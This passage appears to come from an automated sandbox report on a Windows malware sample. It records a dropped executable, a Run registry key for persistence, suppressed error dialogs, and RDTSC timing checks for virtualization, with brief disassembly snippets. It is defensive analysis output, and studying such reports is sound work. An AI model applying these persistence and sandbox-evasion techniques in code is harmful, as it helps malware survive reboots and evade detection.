Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402814 push 004012B8h; ret 0_2_00402827
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403214 push 004012B8h; ret 0_2_00403227

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exe

Boot Survival:

Creates an autostart registry key
Source: C:\Windows\SysWOW64\WWAHost.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run TV1TEJQ8W4
Source: C:\Windows\SysWOW64\WWAHost.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run TV1TEJQ8W4

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\ACre0O2rKa.exe RDTSC instruction interceptor: First address: 0000000000407244 second address: 000000000040724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ACre0O2rKa.exe RDTSC instruction interceptor: First address: 00000000004074AE second address: 00000000004074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc